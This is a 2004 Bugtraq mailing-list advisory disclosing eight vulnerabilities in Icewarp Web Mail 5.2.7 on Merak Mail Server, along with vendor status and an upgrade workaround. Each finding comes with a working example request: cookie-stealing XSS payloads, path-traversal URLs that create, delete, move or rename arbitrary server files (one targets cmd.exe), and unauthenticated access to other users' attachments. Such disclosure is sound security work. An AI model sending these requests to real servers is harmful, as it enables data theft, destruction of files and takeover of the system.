[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple vulnerabilities in Icewarp Web Mail 5.2.7
From:       ShineShadow <ss_contacts () hotmail ! com>
Date:       2004-09-10 16:30:33
Message-ID: 20040910163033.27745.qmail () www ! securityfocus ! com
[Download RAW message or body]



ShineShadow Security Report 10092004-01

TITLE: Multiple vulnerabilities in Icewarp Web Mail 5.2.7

BACKGROUND

Merak Mail Server, with the revolutionary Merak Mail Server GroupWare Server, \
cutting-edge Merak Mail Server Instant Antispam and much more, is the fastest, most \
stable, secure and 100% virus free mail server on the market today.  Every day \
companies choose Merak Mail Server's stability, speed, security, functionality, \
scalability and multi-tiered delegated manageability over products costing thousands \
of dollars more yet lacking the sophistication that Merak delivers. In less than 10 \
minutes you can have the same professional email server that organizations such as \
NATO, the U.S. Navy, the FBI, Toyota, the U.S. Government, and many ISP Providers and \
Developers depend on every day.

Source: www.MerakMailServer.com (official web-site)

VULNERABLE PRODUCTS

MERAK Mail Server 7.4.5 with Icewarp Web Mail 5.2.7 (maybe earlier also vulnerable). \
MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 is vulnerable to vulnerability \
#5.

DETAILS

1.Multiple cross-site scripting (XSS) vulnerabilities.

Active session required: YES

Description: Remote user, who HAS active session on Merak Mail Server, can execute \
cross-site scripting (XSS) attack. It could be used for executing malicious code in \
web browsers of other users.

Vulnerable pages: 
accountsettings.html
search.html

Examples:
http:// [targethost]:32000/mail/accountsettings.html->Add->&#8221;Account \
name&#8221;,&#8221;Incoming mail server&#8221;,&#8221;User name&#8221; = \
&lt;script&gt; alert(document.cookie) &lt;/script&gt; http:// \
[targethost]:32000/mail/search.html->&#8221;Search string&#8221; = &lt;script&gt; \
alert(document.cookie) &lt;/script&gt;

2.Arbitrary directories creation on target system.

Active session required: NO

Description: Remote user, who HASN'T active session on Merak Mail Server, can create \
arbitrary directories on local file system of the target. It could be used during \
attack on an affected system.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?Move_x=1&user=../../hacker

3. Full install path disclosure.

Active session required: NO

Description:	Remote user, who HASN'T active session on Merak Mail Server, can \
disclosure full install path of Merak Mail Server. It could be used during attack on \
an affected system.

Vulnerable pages: 
accountsettings_add.html
topmenu.html

Examples: 
http://[target host]:32000/mail/accountsettings_add.html
http://[target host]:32000/mail/topmenu.html

4.Viewing or downloading arbitrary attachments.

Active session required: NO

Description:Remote user, who HASN'T active session on Merak Mail Server, can access \
to attachments of any user. It could be used for access to personal information of \
other users.

Vulnerable pages: attachment.html

Example: 
http://[targethost]:32000/mail/attachment.html?user=merakdemo.com/admin&messageid=20040801&index=3&folder=inbox


5.Creating text file with arbitrary content.

Active session required: YES

Description: Remote user, who HAS active session on Merak Mail Server, can create \
text file on Merak Mail Server with arbitrary content (include special characters). \
Name of file will be accounts.dat. Combining this vulnerability with vulnerability #8 \
attacker could executed arbitrary PHP code and take complete control of an affected \
system.

Vulnerable pages: accountsettings_add.html 

Example:
http://[targethost]:32000/mail/accountsettings_add.html?id=[sessionid]&Save_x=1&accoun \
t[EMAIL]=hacker&account[HOST]=blackhat.org&account[HOSTUSER]=hacker&account[HOSTPASS]=31337&account[HOSTPASS2]=31337&accountid=[any \
text with special characters]

Note: MERAK Mail Server 7.5.2 with Icewarp Mail Server 5.2.8 also vulnerable to it.

6. Arbitrary files deletion on target system.

Active session required: NO

Description: Remote user, who HASN'T active session on Merak Mail Server, can delete \
arbitrary files on local file system of the target. It could be used for deleting any \
data on an affected system or causing denial of service (DOS) conditions.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:/winnt/system32


7. Moving arbitrary files or directories on target system.

Active session required: NO

Description:	Remote user, who HASN'T active session on Merak Mail Server, can moving \
arbitrary files or directories on local file system of the target. It could be used \
for causing denial of service (DOS) conditions or access to arbitrary files on \
affected system.

Vulnerable pages: viewaction.html

Example:
http://[targethost]:32000/mail/viewaction.html?messageid=....//....//config/settings.c \
fg&Move_x=1&originalfolder=c:/Program%20Files/Merak/html/mail&user=../../html/mail

8. Renaming arbitrary files or directories on target system.

Active session required: YES

Description: Remote user, who HAS active session on Merak Mail Server, can renaming \
arbitrary files or directories on local file system of the target. Moving files or \
directories also possible. It could be used for causing denial of service (DOS) \
conditions or access to arbitrary files on affected system.

Vulnerable pages: folders.html

Example:
http://[targethost]:32000/mail/folders.html?id=[sessionid]&folderold=....//....//..../ \
/&#8230;.//&#8230;.//winnt&folder=....//....//....//&#8230;.//&#8230;.//linux&Save_x=1


EXPLOITATION

IceWarp Web Mail (CONTROL service) must be running on Merak Mail Server (default \
ENABLE). Only web browser is needed for exploitation of this vulnerabilities.

WORKAROUND

Upgrade to MERAK Mail Server 7.5.2 with Icewarp Web Mail 5.2.8 or higher. Disabling \
of Icewarp Web Mail service (Control.exe) also possible.

VENDOR STATUS

Vendor has been contacted on August 6th for this and some other vulnerabilities (not \
described in this report). No response, but new version of the product (MERAK Mail \
Server 7.5.2 with Icewarp Web Mail 5.2.8) has been released August, 12th. NOT ALL \
REPORTED VULNERABILITIES HAS BEEN FIXED IN ICEWARP WEB MAIL 5.2.8.

SUMMARY

An attacker who successfully exploited vulnerabilities described in this report could \
take complete control of a Merak Mail Server 7.4.5 or an affected remote system. \
Icewarp Web Mail 5.2.8 also vulnerable to other (undescribed in this report) critical \
vulnerabilities. An attacker who successfully exploited of this undescribed \
vulnerabilities could take complete control of a Merak Mail Server 7.5.2 or an \
affected remote system. I&#8217;m not advice to use this product, you must disable \
Icewarp Web Mail service.   
CREDITS

ShineShadow, undependent computer security expert. 
To get more information, please contact me by e-mail.

10.09.2004
ShineShadow,
ss_contacts@hotmail.com


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic